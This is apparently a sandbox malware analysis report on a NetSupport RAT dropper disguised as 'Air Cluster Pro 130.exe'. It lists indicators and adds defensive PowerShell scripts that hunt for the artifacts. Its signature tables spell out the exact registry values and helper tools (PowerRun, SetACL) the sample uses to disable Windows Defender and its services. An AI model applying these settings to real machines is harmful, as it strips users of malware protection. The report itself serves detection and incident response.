Malware Analysis Report

2025-04-13 09:52

Sample ID 230709-3rxfcsha9v
Target Air Cluster Pro 130.exe
SHA256 47eb4710f7de558af843178388748abd984027eb76cdd1b6ff50fa8257babeed
Tags: netsupport discovery evasion rat trojan
Score: 10/10

Table of Contents

- Analysis Overview
- MITRE ATT&CK
  - Enterprise Matrix V6
- Analysis: static1
  - Detonation Overview
  - Signatures
- Analysis: behavioral1
  - Detonation Overview
  - Command Line
  - Signatures
  - Processes
  - Network
  - Files

Analysis Overview

Score: 10/10

SHA256: 47eb4710f7de558af843178388748abd984027eb76cdd1b6ff50fa8257babeed

Threat Level: Known bad

The file Air Cluster Pro 130.exe was found to be: Known bad.

Malicious Activity Summary

netsupport discovery evasion rat trojan

NetSupport

Modifies Windows Defender notification settings

Modifies security service

Modifies Windows Defender Real-time Protection settings

Downloads MZ/PE file

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Windows security modification

Checks installed software on the system

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

NSIS installer

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-07-09 23:45

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-07-09 23:45
Reported: 2023-07-09 23:48
Platform: win10-20230703-en
Max time kernel: 71s
Max time network: 153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\DllHost.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" | C:\Windows\system32\svchost.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\svchost.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\System32\Conhost.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\System32\Conhost.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" | C:\Windows\system32\DllHost.exe | N/A

Modifies Windows Defender notification settings

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Windows\SysWOW64\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | C:\Windows\SysWOW64\reg.exe | N/A

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A

NetSupport

rat netsupport

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
N/A | N/A | C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe | N/A
N/A | N/A | C:\Windows\system32\svchost.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe | N/A
N/A | N/A | C:\Windows\System32\Conhost.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\System32\Conhost.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\System32\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | N/A | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | N/A | N/A
N/A | N/A | C:\Windows\System32\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | N/A | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\System32\Conhost.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Signature Updates | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL64.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\DisableAntiVirus = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
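The Defender-related signatures above describe one end state: the Real-Time Protection components switched off through the Policies key, WinDefend and wscsvc set to Start=4 (Disabled), Security Center notifications silenced, and DisableAntiVirus set. Worth noticing is where each write landed. The Policies rows carry no WOW6432Node prefix even though they were written by the 32-bit SysWOW64\reg.exe, because HKLM\SOFTWARE\Policies is a shared, non-redirected key, so those values sit in the view the 64-bit Defender service reads. DisableAntiVirus and the Notifications values, by contrast, were written into the 32-bit WOW6432Node view, which a 64-bit service does not consult. The PowerShell below is an added triage script, not part of the sandbox report or of the sample: it reads those settings back on a suspect host, checks both registry views, and asks the engine for its own live status. It assumes an elevated session on a Windows 10 host with the Defender PowerShell module present; the function name and the output object shape are this script's own convention.

```powershell
# Added triage script, not part of the sandbox report or the sample. It reads back
# the Defender settings the report shows being tampered with and returns one object
# per finding. Run in an elevated PowerShell on the suspect host. Key paths, value
# names and service names are the ones in the report; the function name and the
# output shape are this script's own convention.

function Get-DefenderTamperFindings {
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding($area, $item, $value, $note) {
        $findings.Add([pscustomobject]@{ Area = $area; Item = $item; Value = $value; Note = $note })
    }

    # 1. Real-Time Protection policy values the sample set to 1 (reg.exe, PowerRun64,
    #    SetACL64, bsetgaf). HKLM\SOFTWARE\Policies is a shared (non-redirected) key,
    #    so the 32-bit SysWOW64\reg.exe writes landed in the view the 64-bit service reads.
    $rtpKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'
    $rtpNames = 'DisableRealtimeMonitoring', 'DisableBehaviorMonitoring',
                'DisableScanOnRealtimeEnable', 'DisableScriptScanning',
                'DisableOnAccessProtection', 'DisableIOAVProtection',
                'DisableRoutinelyTakingAction'
    if (Test-Path $rtpKey) {
        $rtp = Get-ItemProperty -Path $rtpKey
        foreach ($name in $rtpNames) {
            $prop = $rtp.PSObject.Properties[$name]
            if ($prop -and [int]$prop.Value -eq 1) {
                Add-Finding 'RTP policy' $name $prop.Value 'component disabled by policy'
            }
        }
    }

    # 2. DisableAntiVirus and the Security Center notification switches. The report
    #    shows them under WOW6432Node (the 32-bit view, written by the 32-bit
    #    PowerRun.exe / reg.exe). A 64-bit service reads the native view, so check both
    #    and treat a hit in either view as evidence of tampering.
    $checks = @(
        @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender';                                           Name = 'DisableAntiVirus' },
        @{ Key = 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows Defender';                               Name = 'DisableAntiVirus' },
        @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications';             Name = 'DisableNotifications' },
        @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications';             Name = 'DisableEnhancedNotifications' },
        @{ Key = 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications'; Name = 'DisableNotifications' },
        @{ Key = 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications'; Name = 'DisableEnhancedNotifications' }
    )
    foreach ($c in $checks) {
        if (-not (Test-Path $c.Key)) { continue }
        $prop = (Get-ItemProperty -Path $c.Key).PSObject.Properties[$c.Name]
        if ($prop -and [int]$prop.Value -eq 1) {
            $view = if ($c.Key -like '*WOW6432Node*') { '32-bit view' } else { 'native view' }
            Add-Finding 'Defender / Security Center' "$($c.Key)\$($c.Name)" $prop.Value $view
        }
    }

    # 3. Service start type: 4 = Disabled. The report shows ControlSet001; the live
    #    control set is reachable through CurrentControlSet.
    foreach ($svc in 'WinDefend', 'wscsvc') {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
        if (-not (Test-Path $key)) { continue }
        $start = (Get-ItemProperty -Path $key -Name Start -ErrorAction SilentlyContinue).Start
        if ($start -eq 4) { Add-Finding 'Service' $svc $start 'Start=4 (Disabled)' }
    }

    # 4. Ask the engine itself. Registry and engine can disagree (Tamper Protection may
    #    have kept the engine running, or the service may already be stopped), so the
    #    live status is the value that matters for containment decisions.
    if (Get-Command Get-MpComputerStatus -ErrorAction SilentlyContinue) {
        $status = Get-MpComputerStatus -ErrorAction SilentlyContinue
        if ($status) {
            foreach ($flag in 'AntivirusEnabled', 'RealTimeProtectionEnabled',
                              'BehaviorMonitorEnabled', 'IoavProtectionEnabled',
                              'OnAccessProtectionEnabled') {
                if (-not $status.$flag) {
                    Add-Finding 'Engine status' $flag $status.$flag 'reported off by Get-MpComputerStatus'
                }
            }
        } else {
            Add-Finding 'Engine status' 'Get-MpComputerStatus' 'n/a' 'engine did not answer (service stopped or disabled?)'
        }
    }
    return $findings
}

Get-DefenderTamperFindings | Format-Table -AutoSize
```

An empty result means none of the report's registry changes are present and the engine reports all components on; any finding in the RTP policy, Service or Engine status areas is actionable, whereas a hit only in the 32-bit view tells you the installer ran but did not reach the setting the 64-bit service honours.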

Checks installed software on the system

discovery

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-DLQVL.tmp | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\mfcm140.dll | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\ODISSDK.dll | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\DMReportSnapshot.dll | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File created | C:\Program Files (x86)\Air Cluster Pro 130.exe\is-KUGKJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp | N/A
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\mpnfimp.dll | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-E3T9M.tmp | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-NCNS5.tmp | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-N1EFL.tmp | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-8J05F.tmp | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File created | C:\Program Files (x86)\Air Cluster Pro 130.exe\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp | N/A
File opened for modification | C:\Program Files (x86)\Air Cluster Pro 130.exe\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp | N/A
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\cnpacnoc.dll | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-A7BIE.tmp | C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
File opened for modification | C:\Windows\Debug\ESE.TXT | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
File opened for modification | C:\Windows\Logs\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A
File opened for modification | C:\Windows\Logs\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A
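The "Executes dropped EXE" and "Drops file" tables give the on-disk footprint of this chain: an Inno Setup stage (the is-*.tmp directories and the unins000.dat uninstaller) that lays down a randomly named vendor folder under Program Files (x86), an NSIS stage (nsx582E.tmp) that unpacks PowerRun and SetACL to do the Defender tampering, and the payload written as wmiprvse.exe under C:\ProgramData\regid.1993-06.com.microsoft\. The genuine WmiPrvSE.exe lives only in System32\wbem (and SysWOW64\wbem), so a copy anywhere under ProgramData or a user profile is a masquerade whatever its signature says. The script below is an added hunt, not part of the sandbox report or the sample: it sweeps a host for those artifacts. Paths, file names and the DLL set are taken from the report; the per-build names (the temp directory suffixes and the random vendor folder) are matched by pattern, and the function name and output shape are this script's own convention. Run it elevated so every profile's Temp directory is readable.

```powershell
# Added hunt script, not part of the sandbox report or the sample. It looks for the
# on-disk artifacts the "Executes dropped EXE" and "Drops file" tables list. Paths,
# file names and the DLL set come from the report; per-build names (nsx582E.tmp,
# is-*.tmp, the random vendor folder) are matched by pattern. Run elevated.

function Find-SampleArtifacts {
    $hits = New-Object System.Collections.Generic.List[object]
    function Add-Hit($kind, $path, $note) {
        $hits.Add([pscustomobject]@{ Kind = $kind; Path = $path; Note = $note })
    }

    # 1. wmiprvse.exe outside System32\wbem / SysWOW64\wbem. The report shows the
    #    dropped copy under C:\ProgramData\regid.1993-06.com.microsoft\; anything
    #    found under ProgramData or a user profile is a masquerade by definition.
    foreach ($root in $env:ProgramData, "$env:SystemDrive\Users") {
        Get-ChildItem -Path $root -Filter 'wmiprvse.exe' -Recurse -File -ErrorAction SilentlyContinue |
            ForEach-Object {
                $sig = Get-AuthenticodeSignature -FilePath $_.FullName
                Add-Hit 'Masqueraded wmiprvse.exe' $_.FullName "Authenticode: $($sig.Status)"
            }
    }
    # Executable content in the SWID tag directory the sample abused is suspect on its own.
    $swid = Join-Path $env:ProgramData 'regid.1993-06.com.microsoft'
    if (Test-Path $swid) {
        Get-ChildItem -Path $swid -Include '*.exe', '*.dll' -Recurse -File -ErrorAction SilentlyContinue |
            ForEach-Object { Add-Hit 'Executable in SWID tag dir' $_.FullName '' }
    }

    # 2. Inno Setup vendor folders in Program Files (x86): an unins000.dat next to at
    #    least two of the DLLs the report lists, or the folder named after the sample.
    $dlls = 'ODISSDK.dll', 'DMReportSnapshot.dll', 'mpnfimp.dll', 'cnpacnoc.dll'
    Get-ChildItem -Path ${env:ProgramFiles(x86)} -Directory -ErrorAction SilentlyContinue | ForEach-Object {
        $dir = $_
        $present = @($dlls | Where-Object { Test-Path (Join-Path $dir.FullName $_) })
        $hasUninst = Test-Path (Join-Path $dir.FullName 'unins000.dat')
        if ($hasUninst -and ($present.Count -ge 2 -or $dir.Name -eq 'Air Cluster Pro 130.exe')) {
            Add-Hit 'Dropped vendor dir' $dir.FullName ('contains: ' + ($present -join ', '))
        }
    }

    # 3. Helper tools the NSIS stage unpacked into %TEMP%\ns*.tmp. PowerRun launches
    #    programs as TrustedInstaller/SYSTEM and SetACL rewrites ACLs; neither belongs
    #    in a user's Temp. Walk every profile's Temp, not just the current user's.
    $tools = 'PowerRun.exe', 'PowerRun64.exe', 'SetACL32.exe', 'SetACL64.exe', 'bsetgaf.exe'
    Get-Item -Path "$env:SystemDrive\Users\*\AppData\Local\Temp" -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-ChildItem -Path $_.FullName -Recurse -File -ErrorAction SilentlyContinue |
                Where-Object { $tools -contains $_.Name -and $_.Directory.Name -like 'ns*.tmp' } |
                ForEach-Object { Add-Hit 'Unpacked helper tool' $_.FullName '' }
        }
    return $hits
}

Find-SampleArtifacts | Format-Table -AutoSize -Wrap
```

The Temp sweep is the noisiest of the three checks, since NSIS temp directories are normally deleted when an installer exits; a surviving ns*.tmp directory that still holds PowerRun or SetACL is a good indicator that the installer was interrupted or that the tools were deliberately left behind for reuse.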

Enumerates physical storage devices

NSIS installer

installer
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | N/A | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe | N/A
